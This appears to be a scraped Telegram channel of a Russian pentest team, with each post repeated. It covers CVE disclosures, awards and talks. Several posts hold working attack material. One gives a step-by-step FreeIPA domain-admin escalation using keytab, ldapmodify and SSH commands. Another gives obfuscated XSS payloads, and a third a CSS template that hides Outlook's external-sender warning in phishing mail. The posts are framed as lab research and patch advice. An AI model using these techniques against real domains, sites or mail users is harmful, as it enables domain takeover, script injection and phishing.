[LPE Linux CVE-2025-32463]
Всем привет!👋
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией🚨
Нам удалось подтвердить PoC в нескольких версиях
1️⃣ На первом рисунке можете увидеть, что версия
2️⃣ Аналогично на втором рисунке версия
3️⃣ А вот на третьем рисунке видно, что версия
Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Всем привет!
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией
sudo -R (--chroot) повысить привилегии до root. Нам удалось подтвердить PoC в нескольких версиях
sudo. 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;sudo 1.9.15p2 также подвержена уязвимости;sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
1.9.17.p1Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍5❤3🦄1
[FreeIPA CVE-2025-4404]
Всем привет!👋
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)
🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)
🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT
Обычно он лежит по пути
Чтобы убедиться, что keytab принадлежит машине можно сделать
Там должно быть что-то типа такого
🔘 Этап 2. Получение TGT
Копируем полученный keytab себе на машину по тому же пути
🔘 Этап 3. Подмена krbCanonicalName в LDAP
Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = admin@TEST.LOCAL.
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
Применяем:
🔘 Этап 4. Получение TGT уже с именем admin@TEST.LOCAL
Видим что-то типа:
🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣 Подробности в официальных источниках
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Всем привет!
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
Обычно он лежит по пути
/etc/krb5.keytabЧтобы убедиться, что keytab принадлежит машине можно сделать
klist -k /etc/krb5.keytab
Там должно быть что-то типа такого
host/client.test.local@TEST.LOCALКопируем полученный keytab себе на машину по тому же пути
/etc/krb5.keytab и потом выполняем команды:kinit -k host/client.test.local
klist
Вся соль начинается здесь:
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: admin@TEST.LOCAL
Применяем:
ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif
kinit -k host/client.test.local
klist
Видим что-то типа:
Default principal: admin@TEST.LOCAL
ssh admin@ipa.test.local
whoami
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍8❤4🌭1🦄1
[ Итоги Bug Bounty за Q2 2025 ]
Всем привет!👋
Недавно подвели топ Исследователей за прошедший квартал на BI.ZONE Bug Bounty.
Мне по итогам 2-го квартала 2025 г. удалось залететь в🔝 )
Впечатления мега-приятные, результатом я более чем доволен, ведь ещё относительно недавно я делился первыми успехами тут и тут, а сейчас разделил топ с сильнейшими и именитыми хантерами платформы @bizone_bb.
Далее напишу несколько тезисов и некоторую статистику по итогам этих результатов:
➡️ Стал ли я считать себя крутым web-ером?
Скорее нет, но однозначно у меня повысилась насмотренность, я стал узнавать некоторые технические решения/используемые паттерны с полувзгляда и подбирать проверки, специфичные для конкретного стека на лету. Также в целом прокачался и выстроил некий план проверок под себя, потому что удалось пощупать веб-сервисы разных вендоров после многих крутых Исследователей, где нужно иногда мыслить шире, а не обкладываться в лоб условным
➡️ Теперь статистика:
⏺ Активно хантил я с 9 мая и до 26 июня, за это время сдал 22 подтвержденных репорта (1 из репортов зачелся в Q2 будучи отправленным ещё в марте). Программы 50/50 были приватными/публичными
⏺ Хантил я преимущественно черным ящиком (не использовал симку с номером тел. и практически нигде не регистрировал личный кабинет через почту). Тут могу отметить, что даже на поверхности находятся баги и весьма неплохие. Да, в среднем это low-medium находки, но свой кусочек пирога можно урвать, если внимательно исследовать и то, что лежит на поверхности функциональности до авторизации даже после десятков сданных отчетов от других багхантеров
⏺ Заметил интересный факт, о котором говорили многие хантеры независимо друг от друга: для 80% моих багов я даже не открывал Burp 😈 .
Очень "прокачался" в связке🖼️ + 🪙 . Для многих задач этого было более чем достаточно
⏺ Был приятно удивлен триажем как от самих вендоров, так и от первичного триажа @bizone_bb. Порадовала и скорость, и фактура (были информы, куда без них, но с адекватным обоснованием), за всё время только по одному репорту встретил на мой взгляд непонимание статуса
Также было приятно быстро получать фидбэк по нескольким возникшим вопросам по работе самой платформы от Руководителя продукта, это здорово
⏺ В процессе этого хантинга наткнулся на 2-3 необычных уязвимости бизнес-логики, но словил
⏺ А
Важно грамотно и лаконично описывать импакт — на мой взгляд это показывает и Ваш уровень как специалиста, так и уважение к Вендору/Триажеру, ведь всегда приятно читать понятный, структурированный и аккуратно оформленный отчет.
У меня иногда на формирование отчета уходило достаточно много времени, однако 1 раз это явно принесло свои плоды — первичный
Пост получается большим, поэтому если у Вас есть вопросы по хантингу — пишите в комментариях, с удовольствием отвечу!
В будущих постах планирую рассказать больше о технике, используемых инструментах и методологии поисков багов с моей стороны. Плюсом продолжим делиться интересными кейсами, которые выстреливают на BB, оставайтесь с нами👨💻
@GigaHack
#web #bug_bounty
Всем привет!
Недавно подвели топ Исследователей за прошедший квартал на BI.ZONE Bug Bounty.
Мне по итогам 2-го квартала 2025 г. удалось залететь в
топ-3 по количеству принятых отчетов, а также в топ-5 по начисленному рейтингу (по выплатам я далеко не в топе, но всё впереди Впечатления мега-приятные, результатом я более чем доволен, ведь ещё относительно недавно я делился первыми успехами тут и тут, а сейчас разделил топ с сильнейшими и именитыми хантерами платформы @bizone_bb.
Далее напишу несколько тезисов и некоторую статистику по итогам этих результатов:
Скорее нет, но однозначно у меня повысилась насмотренность, я стал узнавать некоторые технические решения/используемые паттерны с полувзгляда и подбирать проверки, специфичные для конкретного стека на лету. Также в целом прокачался и выстроил некий план проверок под себя, потому что удалось пощупать веб-сервисы разных вендоров после многих крутых Исследователей, где нужно иногда мыслить шире, а не обкладываться в лоб условным
dirsearch-ем и иным fuzzing-ом вслепуюОчень "прокачался" в связке
DevTools Mozilla Google-Dorking🔎 + curl = валидная бага info, так как буквально в соседней программе на том же стеке этой же баге был присвоен статус low/medium, и триажил это вроде бы один человек. Но меня это не напрягало, бага в любом случае была минорной.Также было приятно быстро получать фидбэк по нескольким возникшим вопросам по работе самой платформы от Руководителя продукта, это здорово
дубликат, причем они меня не расстроили, а наоборот добавили мотивации. Их я воспринял как мысль:"О, круто, я смотрю в нужном направлении, работаем дальше".info отчеты я перестал воспринимать близко к сердцу — просто решил, что нужно продолжать хантить и прокачивать навыки. Важно грамотно и лаконично описывать импакт — на мой взгляд это показывает и Ваш уровень как специалиста, так и уважение к Вендору/Триажеру, ведь всегда приятно читать понятный, структурированный и аккуратно оформленный отчет.
У меня иногда на формирование отчета уходило достаточно много времени, однако 1 раз это явно принесло свои плоды — первичный
info превратился в medium, так как я предложил рассмотреть вектор под другим углом и сам докрутил багу (показал альтернативную возможность эксплуатации)Пост получается большим, поэтому если у Вас есть вопросы по хантингу — пишите в комментариях, с удовольствием отвечу!
В будущих постах планирую рассказать больше о технике, используемых инструментах и методологии поисков багов с моей стороны. Плюсом продолжим делиться интересными кейсами, которые выстреливают на BB, оставайтесь с нами
@GigaHack
#web #bug_bounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥13❤3🦄1
[ CVE-2024-32122 FortiOS ]
Всем привет!👋
Недавно мы с @VlaDriev зарегистрировали CVE, которая встречается в различных устройствах и продуктах Fortinet.
Процесс регистрации немного затянулся, багу закинули вендору еще весной 2024 года. Нам сразу же ответили и подтвердили наличие уязвимости, но вот исправить ее смогли только спустя год.
Эта уязвимость позволяет получить учетные данные от LDAP в открытом виде. Злоумышленнику нужно лишь частично изменить конфигурацию коннектора.
Для эксплуатации нам нужно знать пароль от уязвимого устройства линейки Fortinet. Казалось бы — уязвимость минорная, да ещё мол и пароль привилегированной УЗ надо достать, чтобы поковыряться в конфигурациях. И Вы будете правы с данными тезисами, но давайте взглянем на проблему комплексно.
➡️ Во-первых, ярким примером таких устройств, конечно, являются МФУ: многие внутрянщики знают, что принтеры являются лакомым куском для атакующих, но не одними принтерами едины. Уязвимыми также могут быть CMS, камеры, сетевое оборудование и многие другие устройства.🚨
➡️ Во-вторых, проблема в том, что такие устройства не живут в инфраструктурах в вакууме, а сконфигурированы в связке с какими-то сервисами.
Приведем пример: настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные файлы на сетевую шару.
На практике, попав в консоль управления такого устройства, мы можем менять IP-адрес коннектора на подконтрольный нам. Таким образом, нам достаточно поднять
И всё-таки, доступ же надо как-то получить к этим конфигурациям? Да, но на практике многие устройства подвержены ряду недостатков/уязвимостей:
▪️ УД по умолчанию — база на принтерах.
▪️ IDOR (выделен отдельно от уязвимостей, потому что встречается часто).
▪️ Также часто выстреливают какие-то XXE/Path traversal уязвимости, позволяющие достать содержимое конфига.
И как мы уже сказали выше — эти устройства не живут сами по себе, а на практике интегрированы в доменную инфраструктуру, в частности, в
Получив УЗ мы можем сразу делать relay на LDAP, на центр сертификации (AD CS) и вот мы уже в шаге от доменного администратора или как минимум можем залутать валидную доменную УЗ и собирать дальше информацию о домене.
Здесь надо понимать, что особенно во внутреннем периметре всё очень хрупкое и часто получается выстроить цепочку атак. Поэтому мелочей здесь не бывает, и даже low-баги по шкале CVSS могут выстроиться в крутую цепочку повышения привилегий и вывести вас в дамки.
Какой итог? Подходить к вопросам безопасности любой инфраструктуры надо комплексно, ни один реальный хакер не будет ограничиваться ТЗ/строгим скоупом ресурсов, как часто это бывает на пентестах. Он будет искать любую зацепку для компрометации ваших IT-активов. Будьте грамотны и смотрите на вопросы безопасности с разных сторон
@GigaHack
#internal #pentest #AD #CVE
Всем привет!
Недавно мы с @VlaDriev зарегистрировали CVE, которая встречается в различных устройствах и продуктах Fortinet.
Процесс регистрации немного затянулся, багу закинули вендору еще весной 2024 года. Нам сразу же ответили и подтвердили наличие уязвимости, но вот исправить ее смогли только спустя год.
Эта уязвимость позволяет получить учетные данные от LDAP в открытом виде. Злоумышленнику нужно лишь частично изменить конфигурацию коннектора.
Для эксплуатации нам нужно знать пароль от уязвимого устройства линейки Fortinet. Казалось бы — уязвимость минорная, да ещё мол и пароль привилегированной УЗ надо достать, чтобы поковыряться в конфигурациях. И Вы будете правы с данными тезисами, но давайте взглянем на проблему комплексно.
Приведем пример: настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные файлы на сетевую шару.
На практике, попав в консоль управления такого устройства, мы можем менять IP-адрес коннектора на подконтрольный нам. Таким образом, нам достаточно поднять
responder в режиме анализа и получить clear-text или хэш указанных учетных данных.И всё-таки, доступ же надо как-то получить к этим конфигурациям? Да, но на практике многие устройства подвержены ряду недостатков/уязвимостей:
И как мы уже сказали выше — эти устройства не живут сами по себе, а на практике интегрированы в доменную инфраструктуру, в частности, в
Active Directory. Получив УЗ мы можем сразу делать relay на LDAP, на центр сертификации (AD CS) и вот мы уже в шаге от доменного администратора или как минимум можем залутать валидную доменную УЗ и собирать дальше информацию о домене.
Здесь надо понимать, что особенно во внутреннем периметре всё очень хрупкое и часто получается выстроить цепочку атак. Поэтому мелочей здесь не бывает, и даже low-баги по шкале CVSS могут выстроиться в крутую цепочку повышения привилегий и вывести вас в дамки.
Какой итог? Подходить к вопросам безопасности любой инфраструктуры надо комплексно, ни один реальный хакер не будет ограничиваться ТЗ/строгим скоупом ресурсов, как часто это бывает на пентестах. Он будет искать любую зацепку для компрометации ваших IT-активов. Будьте грамотны и смотрите на вопросы безопасности с разных сторон
@GigaHack
#internal #pentest #AD #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍8💯2🦄2
[ GigaHackers в шорт-листе премии pentest award ]
Всем привет, друзья!👋
На днях опубликовали шорт-лист номинантов премии pentest award от Awillix.✅
Наши кейсы не остались в стороне в этом году, попали в шорт-лист по следующим номинациям:
➡️ Пробив WEB
@VlaDriev и я вместе с ним (совместная работа двух🔥 🎆 )
➡️ «**ck the logic»
@Oki4_Doki (ето я)
➡️ «Ловись рыбка»
@Oki4_Doki (ето я)
➡️ «Out of Scope»
Снова @VlaDriev (в тройке с нашими друзьями-коллегами. Очень интересная для сообщества этичных хакеров работа!)
Также приятно видеть в списке очень много знакомых и сильных специалистов⚡️
P/S в том году @VlaDriev и @WILD_41 попали в шорт-лист, а Влад занял 2 место в номинации "девайс". Посмотрим, сможем ли в этом году также попасть в тройку, награждение состоится уже совсем скоро 1 августа в 18:30 по Мск. 👉 Трансляция мероприятия будет доступна по ссылке.
#pentestaward
Всем привет, друзья!
На днях опубликовали шорт-лист номинантов премии pentest award от Awillix.
Наши кейсы не остались в стороне в этом году, попали в шорт-лист по следующим номинациям:
@VlaDriev и я вместе с ним (совместная работа двух
GigaHacker-ов @Oki4_Doki (ето я)
@Oki4_Doki (ето я)
Снова @VlaDriev (в тройке с нашими друзьями-коллегами. Очень интересная для сообщества этичных хакеров работа!)
Также приятно видеть в списке очень много знакомых и сильных специалистов
P/S в том году @VlaDriev и @WILD_41 попали в шорт-лист, а Влад занял 2 место в номинации "девайс". Посмотрим, сможем ли в этом году также попасть в тройку, награждение состоится уже совсем скоро 1 августа в 18:30 по Мск. 👉 Трансляция мероприятия будет доступна по ссылке.
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤6👍4👎1🦄1
[ Итоги премии pentest award ]
Друзья, всем привет!👋
Недавно прошла церемония награждения премии Pentest award 2025▶️
В этом году GigaHackers укрепили свои позиции:
@VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем⚡️
Чуть позже выпустим на канале отдельный пост про инструмент с обзором и нюансами🏇
Мне же удалось занять 2 место в номинации "Hack the logic" за поиск логических уязвимостей. В кейсе смог реализовать уязвимость в платежной логике: осуществил реальное списание денежных средств клиента по поддельным данным + мог массово генерировать чеки об оплате, тем самым исчерпывая свободное место на файловом хранилище организации.
Помимо этого хотим также поздравить наших коллег и товарищей с призовыми местами:
@s0i37_channel с 2 местом в номинации "Out of scope" с работой "Google в локалке".
@Alevuc с 2 местом в номинации "Ловись рыбка" с работой "Когда CRM — твой враг, а телеграм зло во плоти"
С остальными результатами и итогами можете ознакомиться👉 тут.
Большое спасибо организаторам, все было как всегда на высочайшем уровне! Обязательно будем принимать участие в следующем году.
@GigaHack
#pentestaward
Друзья, всем привет!
Недавно прошла церемония награждения премии Pentest award 2025
В этом году GigaHackers укрепили свои позиции:
@VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем
BloodHoundIPA - ребята сделали fork популярного инструмента BloodHound для анализа доменов Active Directory и адаптировали его под домены на базе FreeIPA Чуть позже выпустим на канале отдельный пост про инструмент с обзором и нюансами
Мне же удалось занять 2 место в номинации "Hack the logic" за поиск логических уязвимостей. В кейсе смог реализовать уязвимость в платежной логике: осуществил реальное списание денежных средств клиента по поддельным данным + мог массово генерировать чеки об оплате, тем самым исчерпывая свободное место на файловом хранилище организации.
Помимо этого хотим также поздравить наших коллег и товарищей с призовыми местами:
@s0i37_channel с 2 местом в номинации "Out of scope" с работой "Google в локалке".
@Alevuc с 2 местом в номинации "Ловись рыбка" с работой "Когда CRM — твой враг, а телеграм зло во плоти"
С остальными результатами и итогами можете ознакомиться
Большое спасибо организаторам, все было как всегда на высочайшем уровне! Обязательно будем принимать участие в следующем году.
@GigaHack
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22🏆10👍5❤2🤮1
[ Интернациональные XSS ]
Всем привет!👋
Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках🔥
XSS по-армянски 🇦🇲
XSS по-русски 🇷🇺
XSS по-китайски 🇨🇳
На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в
А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов
Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии.
Изучайте технологии фундаментально, не спешите, читайте🔍
@GigaHack
#xss #obfuscation #web
Всем привет!
Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках
XSS по-армянски 🇦🇲
ա="",բ=!ա+ա,գ=!բ+ա,դ=ա+{},ե=բ[ա++],զ=բ[է=ա],ը=++է+ա,թ=դ[է+ը],
բ[թ+=դ[ա]+(բ.գ+դ)[ա]+գ[ը]+ե+զ+բ[է]+թ+ե+դ[ա]+զ][թ](գ[ա]+գ[է]+բ[ը]+զ+ե+"('GigaHackers Ձեզ հարձակվել են')")()XSS по-русски 🇷🇺
а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('GigaHackers '+ document.domain)")()XSS по-китайски 🇨🇳
甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('GigaHackers 受到攻击')"
)()На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в
Unicode (в том числе символы из различных алфавитов). А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов
Function("alert('GigaHackers_text')")()Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии.
Изучайте технологии фундаментально, не спешите, читайте
man, и перед вами откроются новые двери@GigaHack
#xss #obfuscation #web
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍7😁5🤡4👎2
[Подкаст «Метод хакера»]
Всем привет!👋
Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках💬 🎵 💬 🎵 .
Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска:
➡️ Что скрывается за термином «пентест» и зачем он нужен?
➡️ Можно ли доверять сторонним специалистам по пентесту или лучше держать специалистов внутри компании?
➡️ Какие инструменты используют пентестеры?
➡️ Как автоматизировать пентесты на уровне отдельного исполнителя и в масштабах инфраструктуры компании?
Слушать выпуск «Лучшая защита – нападение. А автонападение – еще лучше».
@GigaHack
#gigahack #pentest #talk
Всем привет!
Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках
Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска:
Спасибо за приглашение поучаствовать в проекте! Простым языком обсудили пентесты и их автоматизацию как на уровне отдельного исполнителя, так и в масштабах инфраструктуры компании. Подкаст будет понятен и полезен всем - профессионалам и начинающим.
Слушать выпуск «Лучшая защита – нападение. А автонападение – еще лучше».
@GigaHack
#gigahack #pentest #talk
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍5❤1💅1
[ Когда Outlook перестает сомневаться ]
Всем привет!👋
В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить.
Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках.
Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1).
Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS:
Здесь мы всё красим в белый кроме своего уникального
На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости.
P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим.
В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной.
Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут.
Таким образом, если ты понял правила игры, то можешь их адаптировать под себя
@GigaHack
#social #outlook #bypass
Всем привет!
В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить.
Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках.
Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1).
Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS:
<html>
<head>
<style type="text/css">
body {
display: none !important;
background:#FFFFFF !important;
}
.id100500 {
display: block !important;
}
div[style] {
display: none !important;
background:#FFFFFF !important;
}
p {
display: none !important;
background:#FFFFFF !important;
}
p[style] {
display: none !important;
background:#FFFFFF !important;
}
span {
display: none !important;
background: #FFFFFF !important;
}
span[style] {
display: none !important;
background:#FFFFFF !important;
}
table[style] {
display: none !important;
background:#FFFFFF !important;
}
table {
display: none !important;
background:#FFFFFF !important;
}
td {
display: none !important;
background:#FFFFFF !important;
}
td[style] {
display: none !important;
background:#FFFFFF !important;
}
tr {
display: none !important;
background:#FFFFFF !important;
}
tr[style] {
display: none !important;
background:#FFFFFF !important;
}
tbody {
background:#FFFFFF !important;
display: none !important;
}
tbody[style] {
display: none !important;
background:#FFFFFF !important;
}
</style>
</head>
<body>
<p class="id100500">Привет!</p>
<p class="id100500">Это обманка </p>
</body>
</html>
Здесь мы всё красим в белый кроме своего уникального
class=id100500.На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости.
P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим.
В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной.
Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут.
Таким образом, если ты понял правила игры, то можешь их адаптировать под себя
@GigaHack
#social #outlook #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍9❤1💘1
[ BUGS ZONE 6.0 ]
Всем привет!👋
Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty🪲
Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих).
Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎
Приятная мелочь, так как помню о первых багах и посещение BUGS 3 ещё в качестве гостя, а не хантера
Спасибо @BIZONE_BB и вендорам за приглашение в приватки, а победителей поздравляю с попаданием в топ-5, вы круты!
Был рад пообщаться со старыми товарищами и познакомиться с новыми людьми в комьюнити!🔝
@GigaHack
#bug_bounty #bugs_zone6 #conference
Всем привет!
Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty
Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих).
Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎
Приятная мелочь, так как помню о первых багах и посещение BUGS 3 ещё в качестве гостя, а не хантера
Спасибо @BIZONE_BB и вендорам за приглашение в приватки, а победителей поздравляю с попаданием в топ-5, вы круты!
Был рад пообщаться со старыми товарищами и познакомиться с новыми людьми в комьюнити!
@GigaHack
#bug_bounty #bugs_zone6 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍4❤3💋1
[SOC Forum 2025]
А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025.
Старт доклада уже скоро👋
Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает".
📆 20.11.2025 в 11:00 Мск, зал 4.
Трансляция здесь.🚀
➡️ Проект за проектом, год за годом в процессе проведения пентеста приходится выполнять достаточно много рутинных действий. Это не только утомляет, но и неизбежно приводит к ошибкам, которые могут негативно повлиять на ИТ-инфраструктуру заказчика.
➡️ В рамках доклада мы расскажем о своем опыте автоматизации рутины пентеста, проблемах, с которыми столкнулись, особенностях известных инструментов (Masscan, NetExec, Impacket, NTLM Relay и других), а также о том, как тестировали полученные решения.
@GigaHack
#pentest #soc_forum2025 #conference
А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025.
Старт доклада уже скоро
Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает".
Трансляция здесь.
@GigaHack
#pentest #soc_forum2025 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍9🦄1